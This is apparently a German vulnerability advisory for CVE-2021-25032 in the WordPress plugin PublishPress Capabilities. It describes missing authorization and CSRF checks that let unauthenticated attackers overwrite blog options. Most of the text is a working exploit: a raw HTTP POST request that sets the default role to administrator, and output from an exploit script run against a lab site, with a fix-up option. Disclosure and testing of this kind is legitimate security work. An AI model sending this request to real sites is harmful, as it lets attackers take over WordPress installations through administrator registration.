
PublishPress Capabilities < 2.3.1 - Nicht authentifizierte beliebige Aktualisierung von Optionen zur Kompromittierung des Blogs
PublishPress Capabilities 2.2 - 2.3 - Nicht authentifiziertes beliebiges Options-Update zur Blog-Kompromittierung
Das Plugin verfügt über keine Autorisierungs- und CSRF-Prüfungen beim Aktualisieren der Plugin-Einstellungen über den init-Hook und stellt nicht sicher, dass die zu aktualisierenden Optionen zum Plugin gehören. Infolgedessen könnten nicht authentifizierte Angreifer beliebige Blog-Optionen aktualisieren, wie z. B. die Standardrolle, und jedem neu registrierten Benutzer eine Administratorrolle zuweisen.
POST /wp-admin/admin.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close
page=pp-capabilities-settings&all_options=default_role&default_role=administrator
$ python3 CVE-2021-25032.py -u http://wordpress.lan
Die Plugin-Version ist unter 2.3.1.
Die Plugin-Version ist 2.2
Sicherheitsüberprüfung: http://wordpress.lan
Sie können jetzt einen Benutzer als Administrator registrieren. Denken Sie daran, nach der Registrierung --fix yes auszuführen, um zu verhindern, dass andere die Website ausnutzen.
Registrierung & Abonnent deaktivieren
$ python3 CVE-2021-25032.py -u http://wordpress.lan --fix yes
Sicherheitsüberprüfung: http://wordpress.lan
Optionen erfolgreich gesetzt: http://wordpress.lan/wp-admin/admin.php
Behoben: Sie können sich nicht mehr registrieren